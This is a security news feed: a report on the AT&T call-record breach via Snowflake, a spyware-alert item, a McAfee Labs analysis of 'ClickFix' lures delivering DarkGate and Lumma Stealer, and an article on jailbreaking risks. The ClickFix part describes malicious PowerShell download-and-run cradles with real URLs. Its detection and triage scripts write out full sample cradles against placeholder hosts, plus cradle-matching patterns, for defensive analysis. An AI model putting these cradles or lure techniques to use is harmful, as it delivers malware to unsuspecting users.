News

Crooks Steal Phone, SMS Records for Nearly All AT&T Customers

AT&T Corp. disclosed today that a new data breach has exposed phone call and text message records for roughly 110 million people — nearly all of its customers. AT&T said it delayed disclosing the incident in response to “national security and public safety concerns,” noting that some of the records included data that could be used to determine where a call was made or text message sent. AT&T also acknowledged the customer records were exposed in a cloud database that was protected only by a username and password (no multi-factor authentication needed).

In a regulatory filing with the U.S. Securities and Exchange Commission today, AT&T said cyber intruders accessed an AT&T workspace on a third-party cloud platform in April, downloading files containing customer call and text interactions between May 1 and October 31, 2022, as well as on January 2, 2023.

The company said the stolen data includes records of calls and texts for mobile providers that resell AT&T’s service, but that it does not include the content of calls or texts, Social Security numbers, dates of birth, or any other personally identifiable information.

However, the company said a subset of stolen records included information about the location of cellular communications towers closest to the subscriber, data that could be used to determine the approximate location of the customer device initiating or receiving those text messages or phone calls.

“While the data does not include customer names, there are often ways, using publicly available online tools, to find the name associated with a specific telephone number,” AT&T allowed.

AT&T said it learned of the breach on April 19, but delayed disclosing it at the request of federal investigators. The company’s SEC disclosure says at least one individual has been detained by the authorities in connection with the breach.

In a written statement shared with KrebsOnSecurity, the FBI confirmed that it asked AT&T to delay notifying affected customers.

“Shortly after identifying a potential breach to customer data and before making its materiality decision, AT&T contacted the FBI to report the incident,” the FBI statement reads. “In assessing the nature of the breach, all parties discussed a potential delay to public reporting under Item 1.05(c) of the SEC Rule, due to potential risks to national security and/or public safety. AT&T, FBI, and DOJ worked collaboratively through the first and second delay process, all while sharing key threat intelligence to bolster FBI investigative equities and to assist AT&T’s incident response work.”

TechCrunch quoted an AT&T spokesperson saying the customer data was stolen as a result of a still-unfolding data breach involving more than 160 customers of the cloud data provider Snowflake.

Earlier this year, malicious hackers figured out that many major companies have uploaded massive amounts of valuable and sensitive customer data to Snowflake servers, all the while protecting those Snowflake accounts with little more than a username and password.

Wired reported last month how the hackers behind the Snowflake data thefts purchased stolen Snowflake credentials from dark web services that sell access to usernames, passwords and authentication tokens that are siphoned by information-stealing malware. For its part, Snowflake says it now requires all new customers to use multi-factor authentication.

Other companies with millions of customer records stolen from Snowflake servers include Advance Auto Parts, Allstate, Anheuser-Busch, Los Angeles Unified, Mitsubishi, Neiman Marcus, Progressive, Pure Storage, Santander Bank, State Farm, and Ticketmaster.

Earlier this year, AT&T reset passwords for millions of customers after the company finally acknowledged a data breach from 2018 involving approximately 7.6 million current AT&T account holders and roughly 65.4 million former account holders.

Mark Burnett is an application security architect, consultant and author. Burnett said the only real use for the data stolen in the most recent AT&T breach is to know who is contacting whom and how many times.

“The most concerning thing to me about this AT&T breach of ALL customer call and text records is that this isn’t one of their main databases; it is metadata on who is contacting who,” Burnett wrote on Mastodon. “Which makes me wonder what would call logs without timestamps or names have been used for.”

It remains unclear why so many major corporations persist in the belief that it is somehow acceptable to store so much sensitive customer data with so few security protections. For example, Advance Auto Parts said the data exposed included full names, Social Security numbers, drivers licenses and government issued ID numbers on 2.3 million people who were former employees or job applicants.

That may be because, apart from the class-action lawsuits that invariably ensue after these breaches, there is little holding companies accountable for sloppy security practices. AT&T told the SEC it does not believe this incident is likely to materially impact AT&T’s financial condition or results of operations. AT&T reported revenues of more than $30 billion in its most recent quarter.

—————
Free Secure Email – Transcom Sigma
Boost Inflight Internet
Transcom Hosting
Transcom Premium Domains

Apple Is Alerting iPhone Users of Spyware Attacks

Not a lot of details:

Apple has issued a new round of threat notifications to iPhone users across 98 countries, warning them of potential mercenary spyware attacks. It’s the second such alert campaign from the company this year, following a similar notification sent to users in 92 nations in April.

—————

ClickFix Deception: A Social Engineering Tactic to Deploy Malware

Yashvi Shah and Vignesh Dhatchanamoorthy

McAfee Labs has discovered a highly unusual method of malware delivery, referred to by researchers as the “Clickfix” infection chain. The attack chain begins with users being lured to visit seemingly legitimate but compromised websites. Upon visiting, victims are redirected to domains hosting fake popup windows that instruct them to paste a script into a PowerShell terminal.

The “ClickFix” infection chain represents a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. These compromised websites are often carefully crafted to look genuine, increasing the likelihood of user compliance. Once the script is pasted and executed in the PowerShell terminal, it allows the malware to infiltrate the victim’s system, potentially leading to data theft, system compromise, or further propagation of the malware.

We have observed malware families such as Lumma Stealer and DarkGate leveraging this technique. Here is the heatmap showing the distribution of users affected by the “Clickfix” technique:

Figure 1: Prevalence for the last three months

DarkGate delivered via “ClickFix”

DarkGate is a sophisticated malware known for its ability to steal sensitive information, provide remote access, and establish persistent backdoors in compromised systems. It employs advanced evasion tactics and can spread within networks, making it a significant cybersecurity threat.
McAfee Labs obtained a phishing email with an HTML attachment from its spamtrap.

Figure 2: Email with Attachment

The HTML file masquerades as a Word document, displaying an error prompt to deceive users. This tactic is used to trick users into taking actions that could lead to the download and execution of malicious software.

Figure 3: Fake “extension not installed” error prompt

As shown, the sample displays a message stating, “The ‘Word Online’ extension is NOT installed in your browser. To view the document offline, click the ‘How to fix’ button.”

Before clicking the button, let’s examine the underlying code. It contains several base64-encoded blocks; the one that matters for this scenario sits inside the <Title> tag.

Figure 4: HTML contains Base64-encoded content in the title tag

Decoding this we get,

Figure 5: After decoding the code

The decoded command instructs PowerShell to download an HTA (HTML Application) file from the URL https://www.rockcreekdds.com/wp-content/1[.]hta and save it locally as C:\users\public\Ix.hta, a location every user can write to, so no elevated privileges are needed.

The script then executes this HTA file using the start-process command, which initiates harmful actions on the system. Additionally, the script includes a command (Set-Clipboard -Value ‘ ‘) to clear the contents of the clipboard. After completing its tasks, the script terminates the PowerShell session with exit.

Upon further inspection of the HTML page, we found a JavaScript snippet at the end of the code.

Figure 6: Decoding function snippet

This JavaScript snippet decodes and displays a payload, manages modal interactions for user feedback, and provides functionality for copying content to the clipboard upon user action.

In a nutshell, clicking on the “How to fix” button triggers the execution of JavaScript code that copies the PowerShell script directly onto the clipboard. This script, as previously discussed, includes commands to download and execute an HTA file from a remote server.

Let’s delve into it practically:

Figure 7: Clipboard contains malicious command

The attackers’ additional instruction to press Windows+R (which opens the Run dialog) and then CTRL+V (which pastes the clipboard contents) is the social engineering step that gets the script executed: the Run dialog launches whatever is pasted into it, so the user runs the PowerShell one-liner sitting on the clipboard without ever reading it or understanding its malicious nature. Because the command is started from the Run dialog rather than from an already-open console, the resulting powershell.exe typically has explorer.exe as its parent process, which is a useful hunting pivot.

Once the user does this, the HTA file gets downloaded.

Figure 8: HTA code snippet

The HTA attempts to connect to the marked domain and fetches and executes a PowerShell script from that source. Given below is the malicious script that is stored remotely and executed.

Figure 9: Powershell code snippet

This PowerShell script runs with no further user interaction: it creates a folder on the C: drive, drops an AutoIt executable and script into it, and launches them automatically.

Figure 10: Downloaded zip contains AutoIT script

Following this, DarkGate begins its malicious activity and starts communicating with its command and control (C2) server.
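The chain described above (Run dialog, PowerShell, HTA, PowerShell again, AutoIt) leaves a characteristic parent/child trail in process-creation telemetry. The detection logic below is an added example written for this page, not McAfee’s code. It runs over a handful of constructed Sysmon-style Event ID 1 records (the field names ProcessId, ParentImage, Image and CommandLine are assumptions; adapt them to your EDR’s schema) and flags each step of the chain, while letting an administrator’s ordinary PowerShell session through.

```python
"""Flag ClickFix-style process chains in process-creation telemetry.

Added example, not McAfee's code. It runs over constructed Sysmon-style
Event ID 1 records that mimic the chain described above: the user pastes a
one-liner into the Run dialog (explorer.exe -> powershell.exe), PowerShell
starts an .hta (-> mshta.exe), the HTA runs PowerShell again, which drops
AutoIt. Field names are assumptions; adapt them to your EDR's schema.
"""
import re

# Tokens that, combined with an unusual parent, indicate a paste-and-run cradle.
CRADLE_TOKENS = [
    r"invoke-webrequest|iwr\b|irm\b|invoke-restmethod|downloadstring|downloadfile",
    r"\biex\b|invoke-expression",
    r"-enc(odedcommand)?\b|frombase64string",
    r"set-clipboard",
    r"\.hta\b|mshta",
    r"-w(indowstyle)?\s+hidden",
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> list[str]:
    """Return the list of rule names this event matches (empty = benign)."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    hits = []
    tokens = [t for t in CRADLE_TOKENS if re.search(t, cmd, re.I)]
    if image in ("powershell.exe", "pwsh.exe"):
        # Win+R and the Start-menu shortcut both launch via explorer.exe;
        # legitimate interactive use rarely carries a download cradle.
        if parent == "explorer.exe" and tokens:
            hits.append("clickfix_paste_cradle")
        if parent == "mshta.exe":
            hits.append("hta_spawns_powershell")
    if image == "mshta.exe" and parent in ("powershell.exe", "pwsh.exe"):
        hits.append("powershell_starts_hta")
    if image == "mshta.exe" and re.search(r"https?://", cmd, re.I):
        hits.append("mshta_remote_url")
    if image.startswith("autoit3") and parent in ("powershell.exe", "pwsh.exe"):
        hits.append("powershell_drops_autoit")
    return hits


def hunt(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (ProcessId, matched rules) for every suspicious event."""
    return [(ev["ProcessId"], h) for ev in events if (h := score_event(ev))]


# Constructed sample telemetry (not real logs); example.invalid is a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/1.hta '
                    r'-OutFile C:\users\public\Ix.hta; start-process C:\users\public\Ix.hta; '
                    "Set-Clipboard -Value ' '; exit\""},
    {"ProcessId": 101, "ParentImage": PS, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\users\public\Ix.hta"},
    {"ProcessId": 102, "ParentImage": r"C:\Windows\System32\mshta.exe", "Image": PS,
     "CommandLine": 'powershell -ep bypass -c "iex (irm https://example.invalid/x.ps1)"'},
    {"ProcessId": 103, "ParentImage": PS, "Image": r"C:\temp\AutoIt3.exe",
     "CommandLine": r"C:\temp\AutoIt3.exe C:\temp\script.a3x"},
    # Benign: an admin opens PowerShell from the shell and lists a directory.
    {"ProcessId": 200, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -c Get-ChildItem C:\\"},
]

if __name__ == "__main__":
    for pid, rules in hunt(SAMPLE_EVENTS):
        print(pid, ", ".join(rules))
```

The pivot is the parent/child relationship, not the command line alone: a PowerShell process started by explorer.exe that carries a download cradle is what a Win+R paste looks like, and mshta.exe spawning PowerShell is almost never legitimate. On the endpoint, the RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) retains what was typed into the Run dialog and corroborates the telemetry.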

A similar Clickfix social engineering technique was found to be dropping Lumma Stealer.

Lumma Stealer delivered via “ClickFix”

McAfee Labs discovered a website displaying an error message indicating that the browser is encountering issues displaying the webpage. The site provides steps to fix the problem, which are designed to deceive users into executing malicious actions.

Figure 11: Showing error on accessing the webpage

It directs the target user to perform the following steps:

  1. Click on the “Copy Fix” button.
  2. Right-click on the Windows icon.
  3. Open Windows PowerShell (Admin).
  4. Right-click within the open terminal window (in the Windows console, a right-click pastes the clipboard contents).
  5. Wait for the update to complete.

Let’s analyze the code that gets copied when clicking the “Copy Fix” button.

Figure 12: Base64-encoded content

As we can see, the code includes base64-encoded content. Decoding this content, we get the following script:

Figure 13: After decoding the Base64 content

This PowerShell script first flushes the DNS cache, then decodes a base64-encoded command that fetches a script from the remote URL https://weoleycastletaxis.co.uk/chao/baby/cow[.]html using a specific User-Agent header (likely so that the server hands the payload only to requests carrying that header), executes the fetched script, and clears the screen to hide the activity. It then decodes a second base64 string that sets the clipboard content to a single space, removing the evidence of what the victim pasted. Together these steps download and run remote code covertly while hiding the activity from the user.
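Both lures described above, the DarkGate HTML attachment that hides its one-liner in the <Title> tag and the Lumma Stealer “Copy Fix” text with nested base64 strings, can be unpacked with the same static triage routine. The script below is an added example, not McAfee’s tooling: it pulls base64 blobs out of the raw text, decodes each one (choosing UTF-16LE where PowerShell’s -EncodedCommand or [Text.Encoding]::Unicode would), recurses into nested layers, and reports the URLs and the indicators a responder cares about. The two sample lures it builds are constructed in place to mirror the structure described, not copies of the real pages, and lure.example.invalid is a placeholder host.

```python
"""Static triage for ClickFix lures (added example, not McAfee's tooling).

Extracts base64 blobs from an HTML lure or from the text a "Copy Fix" button
puts on the clipboard, decodes them (UTF-8, or UTF-16LE as used by
powershell -EncodedCommand and [Text.Encoding]::Unicode), recurses into
nested layers, and reports URLs and indicators. The sample lures below are
constructed here; they are not the real pages.
"""
import base64
import html
import re

B64_RE = re.compile(r"[A-Za-z0-9+/]{28,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
INDICATORS = {
    "clipboard_wipe": r"set-clipboard",
    "hta_payload": r"\.hta\b|mshta",
    "download_cradle": r"invoke-webrequest|iwr\b|irm\b|invoke-restmethod|downloadstring",
    "exec_fetched": r"\biex\b|invoke-expression|start-process",
    "custom_user_agent": r"user-?agent",
    "dns_flush": r"clear-dnsclientcache|ipconfig\s*/flushdns",
    "hidden_window": r"-w(indowstyle)?\s+hidden",
}


def _decode(blob: str):
    """Return the blob's plaintext if it decodes to printable text, else None."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except ValueError:
        return None
    # UTF-16LE ASCII text has a NUL in every odd byte position; use that to pick
    # the encoding rather than trusting whichever decode happens to succeed
    # (ASCII bytes decode "successfully" as UTF-16LE into CJK garbage).
    utf16 = len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4
    try:
        text = raw.decode("utf-16-le" if utf16 else "utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def unwrap(text: str, depth: int = 0, max_depth: int = 4) -> list:
    """Return every decoded layer found in text, outer layers first."""
    layers = []
    if depth >= max_depth:
        return layers
    for m in B64_RE.finditer(text):
        plain = _decode(m.group(0))
        if plain is not None:
            layers.append(plain)
            layers.extend(unwrap(plain, depth + 1, max_depth))
    return layers


def triage(lure: str) -> dict:
    """Decode all layers of an HTML page or copied command and summarise."""
    lure = html.unescape(lure)
    layers = unwrap(lure)
    # Match indicators on the raw text plus every decoded layer, with the
    # undecoded blobs blanked out so random base64 cannot trigger a rule.
    corpus = "\n".join(B64_RE.sub(" ", t) for t in [lure] + layers)
    return {
        "layers": len(layers),
        "urls": sorted(set(URL_RE.findall(corpus))),
        "indicators": sorted(name for name, pat in INDICATORS.items()
                             if re.search(pat, corpus, re.I)),
    }


# --- constructed samples (not the real lures) -------------------------------
def _b64(s: str, encoding: str = "utf-8") -> str:
    return base64.b64encode(s.encode(encoding)).decode()


def build_darkgate_style_lure() -> str:
    """HTML 'Word Online extension missing' page with the one-liner in <title>."""
    cmd = ("powershell -w hidden -c \"iwr https://lure.example.invalid/wp-content/1.hta "
           "-OutFile C:\\users\\public\\Ix.hta; start-process C:\\users\\public\\Ix.hta; "
           "Set-Clipboard -Value ' '; exit\"")
    return (f"<html><head><title>{_b64(cmd)}</title></head><body>"
            "<p>The 'Word Online' extension is NOT installed in your browser.</p>"
            "<button id='fix'>How to fix</button></body></html>")


def build_lumma_style_fix() -> str:
    """Clipboard text from a 'Copy Fix' button: DNS flush, a UTF-16LE-encoded
    fetch with a custom User-Agent, then a UTF-8-encoded clipboard wipe."""
    fetch = ("$r = Invoke-WebRequest -UseBasicParsing -Uri "
             "'https://lure.example.invalid/chao/baby/cow.html' "
             "-Headers @{'User-Agent'='Mozilla/5.0 fix'}; iex $r.Content")
    wipe = "Set-Clipboard -Value ' '; exit"
    return ("ipconfig /flushdns; "
            f"iex ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('{_b64(fetch, 'utf-16-le')}'))); "
            "cls; "
            f"iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{_b64(wipe)}')))")


if __name__ == "__main__":
    for name, sample in (("darkgate-style", build_darkgate_style_lure()),
                         ("lumma-style", build_lumma_style_fix())):
        print(name, triage(sample))
```

Run triage() on a saved .html attachment or on clipboard text captured in a sandbox. On a real page some legitimate URLs will appear in the output alongside the decoded ones; what matters is a URL that surfaces inside a decoded layer next to a download cradle and a clipboard wipe.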

Upon execution, the following process tree is observed:

Figure 14: Process Tree

Because the script downloads the malware from the URL above, a new folder is created under the Temp directory and a zip archive is saved there:

Figure 15: Network activity

The malware is unzipped and dropped in the same folder:

Figure 16: Dropped files

The malware starts communicating with its C2 server as soon as it gets dropped in the targeted system.

Conclusion:

In conclusion, the Clickfix social engineering technique showcases a highly effective and technical method for malware deployment. By embedding base64-encoded scripts within seemingly legitimate error prompts, attackers deceive users into performing a series of actions that result in the execution of malicious PowerShell commands. These commands typically download and execute payloads, such as HTA files, from remote servers, subsequently deploying malware like DarkGate and Lumma Stealer.

Once the malware is active on the system, it begins its malicious activities, including stealing users’ personal data and sending it to its command and control (C2) server. The scripts also take steps to hide their tracks, such as clearing the clipboard, clearing the console and running PowerShell in hidden or minimized windows. By disguising error messages and providing seemingly helpful instructions, attackers manipulate users into unknowingly executing harmful scripts that download and run various kinds of malware.

Mitigations:

At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the Clickfix social engineering technique. Here are our recommended mitigations and remediations:

  1. Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
  2. Install and maintain updated antivirus and anti-malware software on all endpoints.
  3. Implement robust email filtering to block phishing emails and malicious attachments.
  4. Use web filtering solutions to prevent access to known malicious websites.
  5. Deploy firewalls and intrusion detection/prevention systems (IDS/IPS) to monitor and block malicious network traffic.
  6. Use network segmentation to limit the spread of malware within the organization.
  7. Enforce the principle of least privilege (PoLP) to minimize user access to only necessary resources.
  8. Implement security policies to monitor and restrict clipboard usage, especially in sensitive environments.
  9. Implement multi-factor authentication (MFA) for accessing sensitive systems and data.
  10. Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
  11. Continuously monitor and analyze system and network logs for signs of compromise.
  12. Encrypt sensitive data both in transit and at rest to protect it from unauthorized access.
  13. Regularly back up important data and store backups securely to ensure data recovery in case of a ransomware attack or data breach.

Indicators of Compromise (IoCs)

DarkGate (SHA256)
Email: c5545d28faee14ed94d650bda28124743e2d7dacdefc8bf4ec5fc76f61756df3
HTML: 0db16db812cb9a43d5946911501ee8c0f1e3249fb6a5e45ae11cef0dddbe4889
HTA: 5c204217d48f2565990dfdf2269c26113bd14c204484d8f466fb873312da80cf
PS: e9ad648589aa3e15ce61c6a3be4fc98429581be738792ed17a713b4980c9a4a2
ZIP: 8c382d51459b91b7f74b23fbad7dd2e8c818961561603c8f6614edc9bb1637d1
AutoIT script: 7d8a4aa184eb350f4be8706afb0d7527fca40c4667ab0491217b9e1e9d0f9c81

Lumma Stealer
URL: tuchinehd[.]com
PS (SHA256): 07594ba29d456e140a171cba12d8d9a2db8405755b81da063a425b1a8b50d073
ZIP (SHA256): 6608aeae3695b739311a47c63358d0f9dbe5710bd0073042629f8d9c1df905a8
EXE (SHA256): e60d911f2ef120ed782449f1136c23ddf0c1c81f7479c5ce31ed6dcea6f6adf9

 

The post ClickFix Deception: A Social Engineering Tactic to Deploy Malware appeared first on McAfee Blog.

—————

How Does Jailbreaking Or Rooting Affect My Mobile Device Security?

In today’s interconnected world, our mobile devices serve as essential tools for communication, productivity, and entertainment. However, for some tech-savvy users, the allure of unlocking the full potential of their devices through jailbreaking (for iOS) or rooting (for Android) can be tempting. While these processes offer users greater control and customization over their devices, they also raise significant questions about security implications. 

What is jailbreaking? 

To “jailbreak” a device means to remove the restrictions that Apple (and, historically, its carrier partners) place on iOS, giving the owner root-level access to the operating system and all of its features. Jailbreaking entered the mainstream with the original iPhone, which was sold only for AT&T’s network: the early software unlocks that let it work on other carriers required a jailbroken phone first. (Carrier unlocking and jailbreaking are distinct things today, but at the time one depended on the other.) 

What is rooting? 

Similar to jailbreaking, “rooting” is the term for the process of removing the limitations on a phone or tablet running the Android operating system. By gaining privileged control, often referred to as “root access,” over an Android device’s operating system, users can modify system files, remove pre-installed bloatware, install custom ROMs, and unlock features not accessible on stock devices.  

Why do people want to jailbreak or root?  

Rooting or jailbreaking grants users deeper access to the device’s operating system, allowing for extensive customization of the user interface, system settings, and even hardware functionality. Advanced users can optimize system performance, remove unnecessary bloatware, and tweak settings to improve battery life, speed, and responsiveness. 

Consequences of jailbreaking or rooting 

However, hacking your device opens security holes that may not be readily apparent and undermines the device’s built-in security measures: jailbreaking disables the code-signing enforcement that stops unsigned code from running on iOS, and rooting makes superuser access available to any app that asks for it or tricks the user into granting it. Jailbroken and rooted phones are therefore much more susceptible to viruses and malware, because users can bypass the Apple and Google application vetting processes that help ensure the apps they download are clean. Many banking, payment and corporate (MDM-managed) apps also detect a jailbroken or rooted device and refuse to run on it. 

In addition to security vulnerabilities, hacking your device may lead to a voided manufacturer’s warranty, leaving you without official support for repairs or replacements. Altering the device’s operating system can also lead to instability, crashes, and performance issues, especially if incompatible software or modifications are installed. 

While rooting or jailbreaking may offer users enticing opportunities for customization and optimization of their mobile devices, the associated risks cannot be overlooked. By circumventing built-in security measures, users expose their devices to potential security vulnerabilities, making them more susceptible to viruses and malware. Ultimately, the decision to root or jailbreak a mobile device should be made with careful consideration of the trade-offs involved, as the security risks often outweigh the benefits. 

When thinking about mobile security risks, consider adding reputable mobile security software to your device to augment the built-in security measures. These security solutions provide real-time scanning and threat detection capabilities, helping to safeguard sensitive data and maintain the integrity of the device’s operating system. 

The post How Does Jailbreaking Or Rooting Affect My Mobile Device Security? appeared first on McAfee Blog.

—————